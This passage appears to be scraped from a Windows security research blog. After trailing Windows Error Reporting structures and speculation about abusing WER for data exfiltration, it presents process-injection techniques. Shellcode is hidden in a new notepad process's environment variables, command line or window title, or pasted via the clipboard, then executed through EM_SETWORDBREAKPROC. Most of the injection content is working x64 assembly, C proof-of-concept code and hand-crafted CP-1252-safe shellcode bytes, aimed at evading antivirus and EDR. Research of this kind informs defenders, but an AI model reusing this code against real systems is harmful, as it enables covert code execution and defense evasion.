} WER_GATHER, *PWER_GATHER;

8.4 Custom Meta Data

Applications can register custom meta data using kernelbase!WerRegisterCustomMetadata.

typedef struct _WER_METADATA {
    PVOID                Next;
    WCHAR                Key[64];
    WCHAR                Value[128];
} WER_METADATA, *PWER_METADATA;

8.5 Runtime DLL

Developers might want to customize the reporting process and that’s what kernelbase!WerRegisterRuntimeExceptionModule is for. It inserts the path of DLL into the registration data that’s loaded by werfault.exe once an exception occurs. In the WER_RUNTIME_DLL structure, MAX_PATH is used for CallbackDllPath, but the correct length for the structure and DLL should be read from the Length field.

typedef struct _WER_RUNTIME_DLL {
    PVOID                Next;
    ULONG                Length;
    PVOID                Context;
    WCHAR                CallbackDllPath[MAX_PATH];
} WER_RUNTIME_DLL, *PWER_RUNTIME_DLL;

8.6 Dump Collections

If more than one process is required for dumping, an application can use kernelbase!WerRegisterAdditionalProcess to specify the process and thread ids. I’m open to correction, but it appears that only one thread per process is allowed by the API.

typedef struct _WER_DUMP_COLLECTION {
    PVOID                Next;
    DWORD                ProcessId;   
    DWORD                ThreadId; 
} WER_DUMP_COLLECTION, *PWER_DUMP_COLLECTION;

8.7 Heap Main Header

Finally, the main heap header used for dynamic allocation of memory for WER structures. The signature here should contain a string “HEAP_SIGNATURE”. The mutex is simply for exclusive access during allocations. FreeHeap may be inaccurate, but it appears to be used to improve performance of memory allocations. Instead of requesting a new block of memory from the OS, WER functions can use from this block if possible.

typedef struct _WER_HEAP_MAIN_HEADER {
    WCHAR                Signature[16];
    LIST_ENTRY           Links;
    HANDLE               Mutex;
    PVOID                FreeHeap;
    ULONG                FreeCount;
} WER_HEAP_MAIN_HEADER, *PWER_HEAP_MAIN_HEADER;

The WER service could be a point of privilege escalation and lateral movement. There’s potential to use it for exfiltration of sensitive data by modifying information in the registry settings. An attacker may be capable of dumping a process and having a report sent to a server they control using the CorporateWERServer setting. They might also use their own public key to encrypt this data and prevent recovery of what exactly is being gathered. This is all hypothetical of course and I don’t know if it can actually be used for this.

Windows Process Injection: Command Line and Environment Variables

By: odzhan
31 July 2020 at 04:00

Windows Process Injection: Command Line and Environment Variables

Contents

  1. Introduction
  2. Shellcode
  3. Environment Variables
  4. Command Line
  5. Window Title
  6. Runtime Data

1. Introduction

There are many ways to load shellcode into the address space of a process, but knowing precisely where it’s stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processes’ address space. Red Teamers are known to create a new process before injecting data, but I’ve yet to see any examples of using the command line or environment variables to assist with this.

This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. Memory for where the data resides will initially have Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS that contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;                            //0x0
    ULONG Length;                                   //0x4
    ULONG Flags;                                    //0x8
    ULONG DebugFlags;                               //0xc
    PVOID ConsoleHandle;                            //0x10
    ULONG ConsoleFlags;                             //0x18
    PVOID StandardInput;                            //0x20
    PVOID StandardOutput;                           //0x28
    PVOID StandardError;                            //0x30
    CURDIR CurrentDirectory;                        //0x38
    UNICODE_STRING DllPath;                         //0x50
    UNICODE_STRING ImagePathName;                   //0x60
    UNICODE_STRING CommandLine;                     //0x70
    PVOID Environment;                              //0x80
    ULONG StartingX;                                //0x88
    ULONG StartingY;                                //0x8c
    ULONG CountX;                                   //0x90
    ULONG CountY;                                   //0x94
    ULONG CountCharsX;                              //0x98
    ULONG CountCharsY;                              //0x9c
    ULONG FillAttribute;                            //0xa0
    ULONG WindowFlags;                              //0xa4
    ULONG ShowWindowFlags;                          //0xa8
    UNICODE_STRING WindowTitle;                     //0xb0
    UNICODE_STRING DesktopInfo;                     //0xc0
    UNICODE_STRING ShellInfo;                       //0xd0
    UNICODE_STRING RuntimeData;                     //0xe0
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
    ULONG EnvironmentSize;                          //0x3f0
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 

2. Shellcode

User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

      bits 64
      
      %include "include.inc"
      
      struc stk_mem
        .hs                   resb home_space_size
        
        .bInheritHandles      resq 1
        .dwCreationFlags      resq 1
        .lpEnvironment        resq 1
        .lpCurrentDirectory   resq 1
        .lpStartupInfo        resq 1
        .lpProcessInformation resq 1
        
        .procinfo             resb PROCESS_INFORMATION_size
        .startupinfo          resb STARTUPINFO_size
      endstruc

      %define stk_size ((stk_mem_size + 15) & -16) - 8
      
      %ifndef BIN
        global createproc
      %endif
      
      ; void createproc(WCHAR cmd[]);
createproc:
      ; save non-volatile registers
      pushx  rsi, rbx, rdi, rbp
      
      ; allocate stack memory for arguments + home space
      xor    eax, eax
      mov    al, stk_size
      sub    rsp, rax
      
      ; save pointer to buffer
      push   rcx
      
      push   TEB.ProcessEnvironmentBlock
      pop    r11
      mov    rax, [gs:r11]
      mov    rax, [rax+PEB.Ldr]
      mov    rdi, [rax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    scan_dll
next_dll:    
      mov    rdi, [rdi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
scan_dll:
      mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]

      mov    esi, [rbx+IMAGE_DOS_HEADER.e_lfanew]
      add    esi, r11d             ; add 60h or TEB.ProcessEnvironmentBlock
      ; ecx = IMAGE_DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
      mov    ecx, [rbx+rsi+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress - \
                           TEB.ProcessEnvironmentBlock]
      jecxz  next_dll              ; if no exports, try next DLL in list
      ; rsi = offset IMAGE_EXPORT_DIRECTORY.Name 
      lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd                        ; eax = NumberOfNames
      xchg   eax, ecx
      jecxz  next_dll              ; if no names, try next DLL in list
      
      ; r8 = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
      lodsd
      xchg   eax, r8d              ;
      add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      xchg   eax, ebp              ;
      add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
      ; r9 = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      xchg   eax, r9d
      add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
find_api:
      mov    esi, [rbp+rcx*4-4]    ; rax = AddressOfNames[rcx-1]
      add    rsi, rbx
      xor    eax, eax
      cdq
hash_api:
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    al
      jns    hash_api
      cmp    edx, 0x1b929a47       ; CreateProcessW
      loopne find_api              ; loop until found or no names left
      
      jnz    next_dll              ; not found? goto next_dll
      
      movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
      mov    eax, [r8+rax*4]
      add    rbx, rax              ; rbx += AddressOfFunctions[rdx]
      
      ; CreateProcess(NULL, cmd, NULL, NULL, 
      ;   FALSE, 0, NULL, &si, &pi);
      pop    rdx           ; lpCommandLine = buffer for Edit
      xor    r8, r8        ; lpProcessAttributes = NULL
      xor    r9, r9        ; lpThreadAttributes = NULL
      xor    eax, eax
      mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
      mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
      mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
      mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL
      
      lea    rdi, [rsp+stk_mem.procinfo       ]
      mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi

      lea    rdi, [rsp+stk_mem.startupinfo    ]
      mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si
      
      xor    ecx, ecx
      push   STARTUPINFO_size
      pop    rax
      stosd                         ; si.cb = sizeof(STARTUPINFO)
      sub    rax, 4
      xchg   eax, ecx
      rep    stosb
      call   rbx
      
      ; deallocate stack
      xor    eax, eax
      mov    al, stk_size
      add    rsp, rax
      xor    eax, eax
      
      ; restore non-volatile registers
      popx   rsi, rbx, rdi, rbp  
      ret

3. Environment Variables

Part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

There’s a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then allowing CreateProcessW to transfer or propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

    // generate random name
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Variable names are stored in memory alphabetically and will appear in the same order for the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here will locate the address of the shellcode inside the current environment block, then subtract the base address to obtain the relative virtual address (RVA).

// return relative virtual address of environment block
DWORD get_var_rva(PWCHAR name) {
    PVOID  env;
    PWCHAR str, var;
    DWORD  rva = 0;
    
    // find the offset of value for environment variable
    env = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
    str = (PWCHAR)env;
    
    while(*str != 0) {
      // our name?
      if(wcsncmp(str, name, MAX_NAME_LEN) == 0) {
        var = wcsstr(str, L"=") + 1;
        // calculate RVA of value
        rva = (PBYTE)var - (PBYTE)env;
        break;
      }
      // advance to next entry
      str += wcslen(str) + 1;
    }
    return rva;
}

Once we have the RVA for local process, read the address of environment block in remote process and add the RVA.

// get the address of environment block
PVOID var_get_env(HANDLE hp, PDWORD envlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    
    // get the address RTL_USER_PROCESS_PARAMETERS
    ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    
    // get the address of Environment block 
    ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *envlen = upp.EnvironmentSize;
    return upp.Environment;
}

The full routine will copy the user-supplied command to the Edit control and the shellcode will receive this when the word break callback is executed. You don’t need to use Notepad, but I just wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more detals.

Figure 1. Environment variable of new process containing shellcode.

void var_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               name[MAX_PATH]={0};    
    INT                 i; 
    PVOID               va;
    DWORD               rva, old, len;
    PVOID               env;
    HWND                npw, ecw;

    // generate random name
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct Environment address from new process    
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of environment block in new process
    // then calculate the address of shellcode
    env = var_get_env(pi.hProcess, &len);
    va = (PBYTE)env + get_var_rva(name);

    // set environment block to RWX
    VirtualProtectEx(pi.hProcess, env, 
      len, PAGE_EXECUTE_READWRITE, &old);

    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
cleanup:
    // cleanup and exit
    SetEnvironmentVariable(name, NULL);
    
    if(pi.hProcess != NULL) {
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
    }
}

4. Command Line

This can be easier to work with than environment variables. For this example, only the shellcode itself is used and that can be located easily in the PEB.

    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Reading is much the same as reading environment variables since they both reside inside RTL_USER_PROCESS_PARAMETERS.

// get the address of command line
PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    
    // get the address RTL_USER_PROCESS_PARAMETERS
    ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    
    // get the address of command line 
    ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *cmdlen = upp.CommandLine.Length;
    return upp.CommandLine.Buffer;
}

Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more detals.

Figure 2. Command line of new process containing shellcode.

#define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

void cmd_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               path[MAX_PATH]={0};
    DWORD               rva, old, len;
    PVOID               cmdline;
    HWND                npw, ecw;

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct command line from new process  
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of command line in new process
    // which contains our shellcode
    cmdline = get_cmdline(pi.hProcess, &len);
    
    // set the address to RWX
    VirtualProtectEx(pi.hProcess, cmdline, 
      len, PAGE_EXECUTE_READWRITE, &old);
    
    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

5. Window Title

IMHO, this is the best of three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI like notepad is selected, process explorer doesn’t show any unusual characters for various properties. Set lpTitle to the shellcode and CreateProcessW will inject. As with the other two methods, obtaining the address can be read via the PEB.

    // create a new process using shellcode as window title
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    si.lpTitle     = (PWCHAR)WINEXEC;

6. Runtime Data

Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, “Reserved for use by the C Run-time” and must be NULL or zero prior to calling CreateProcess. The maximum amount of data that can be transferred into a new process is 65,536 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll likely because lpReserved2 didn’t point to the data it expected.

While it didn’t work for me, that’s not to say it can’t work with some additional tweaking. Sources

Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

By: odzhan
7 July 2020 at 00:30
  1. Introduction
  2. Edit Controls
  3. Writing CP-1252 Compatible Code
    1. Initialization
    2. Set RAX to 0
    3. Set RAX to 1
    4. Set RAX to -1
    5. Load and Store Data
    6. Two Byte Instructions
    7. Prefix Codes
  4. Generating Shellcode
  5. Injecting and Executing
  6. Demonstration
  7. Encoding Arbitrary Data
    1. Encoding
    2. Decoding
  8. Acknowledgements
  9. Further Research
  10. Scrapheap

1. Introduction

‘Shatter attacks’ use Window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a followup paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.

Without focusing on the design of Windows itself, Shatter attacks were possible for two reasons: No isolation between processes sharing the same interactive desktop, and for allowing code to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels to prevent a low-privileged process sending messages to a high-privileged process. Data Execution Prevention (DEP) , which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.

ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.

For this post, I’ve written a PoC that does the following:

  • Use the clipboard and WM_PASTE message to inject code into the notepad process.
  • Use the EM_GETHANDLE message and ReadProcessMemory to obtain the buffer address of our code.
  • Use VirtualProtectEx to change memory permissions from Read-Write to Read-Write-Execute.
  • Use the EM_SETWORDBREAKPROC and WM_LBUTTONDBLCLK to execute shellcode.

Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. It’s also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to unicode.

2. Edit Controls

Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.

To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:”s -u %1 %2 \”modexp\””. This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.

Figure 1. Searching memory for the string in Notepad.

To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.

    hw = FindWindow("Notepad", NULL);
    hw = FindWindowEx(hw, NULL, "Edit", NULL);
    emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0); 
    printf("EM Handle : %p\n", emh);

Figure 2. The memory pointer returned by EM_GETHANDLE

The handle points to the buffer allocated for input as you can see in Figure 3.

Figure 3. Buffer allocated for input.

Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is using Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() converting the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain characters in the ranges [0x80, 0x8C], [0x91, 0x9C] or 0x8E, 0x9E and 0x9F. These “bad characters” will be converted to double byte character encodings. For UTF-8, only bytes in range [0x00, 0x7F] can be used.

NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just ensure to avoid two consecutive null bytes that indicate string termination. e.g “\x00\x00”

3. Writing CP-1252 Compatible Code

If writing Ansi shellcode that will be converted to Unicode before execution, let’s start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.

3.1 Initialization

Throughout the code, you’ll see the following.

"\x00\x4d\x00"         /* add   byte [rbp], cl */

Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Using BP requires three bytes and can be used almost right away.

Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems won’t cause an exception. However, the same cannot be said for 64-Bit, which depending on the compiler normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction between 1-5 bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that we’re not overwriting anything on the stack address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.

    ; ************************* prolog
    mov    al, 0
    enter  256, 0
    
    ; save rbp
    push   rbp
    add    [rbp], al
    
    ; create local variable for rbp
    push   0
    push   rsp
    add    [rbp], al
    
    pop    rbp
    add    [rbp], cl

If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.

EDITWORDBREAKPROCA EDITWORDBREAKPROCA;

int EDITWORDBREAKPROCA(
  LPSTR lpch,
  int ichCurrent,
  int cch,
  int code
)
{...}

If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.

3.2 Set RAX to 0

PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.

"\x6a\x00"             /* push  0                   */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x2d\x00\xff\x00\xff" /* sub   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x35\x00\xff\x00\xff" /* xor   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.

"\xb8\x00\xfe\x00\xfe" /* mov   eax, 0xfe00fe00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x25\x00\x01\x00\x01" /* and   eax, 0x01000100      */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

3.3 Set RAX to 1

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"     /* push 0              */
"\x54"         /* push rsp            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\xff\x00"     /* inc  dword [rax]    */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"         /* push  0              */
"\x54"             /* push  rsp            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xc6\x00\x01"     /* mov   byte [eax], 1  */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */

3.4 Set RAX to -1

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.

"\x6a\x00"         /* push  0              */
"\x59"             /* pop   rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xe2\x00"         /* loop  $+2            */
"\x34\x00"         /* xor   al, 0          */
"\x51"             /* push  rcx            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX.

"\x6a\x00"     /* push 0                    */
"\x54"         /* push rsp                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x58"         /* pop  rax                  */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\xff\x00"     /* inc  dword [rax]          */
"\x6b\x00\xff" /* imul eax, dword [rax], -1 */
"\x00\x4d\x00" /* add  byte [rbp], cl       */
"\x59"         /* pop  rcx                  */

3.5 Load and Store Data

Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some aproaches.

Let’s take for example setting EAX to 0x12345678.

"\xb8\x78\x56\x34\x12" /* mov   eax, 0x12345678  */

This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off.

"\x6a\x00"                 /* push 0                          */
"\x54"                     /* push rsp                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\xff\x00"                 /* inc  dword [rax]                */
"\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */
"\x58"                     /* pop  rax                        */
"\x00\x4d\x00"             /* add  byte [rbp], cl             */
"\x35\x00\x56\x00\x12"     /* xor  eax, 0x12005600            */

Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.

"\x6a\x00"                 /* push   0                      */
"\x54"                     /* push   rsp                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\xc7\x00\x78\x00\x34\x00" /* mov    dword [rax], 0x340078  */
"\x58"                     /* pop    rax                    */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */
"\x35\x00\x56\x00\x12"     /* xor    eax, 0x12005600        */
"\x00\x4d\x00"             /* add    byte [rbp], cl         */

Another way using Rotate Left (ROL).

"\x68\x00\x78\x00\x34" /* push  0x34007800        */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x54"                 /* push  rsp               */
"\x00\x4d\x00"         /* add   byte [rbp], cl    */
"\x58"                 /* pop   rax               */
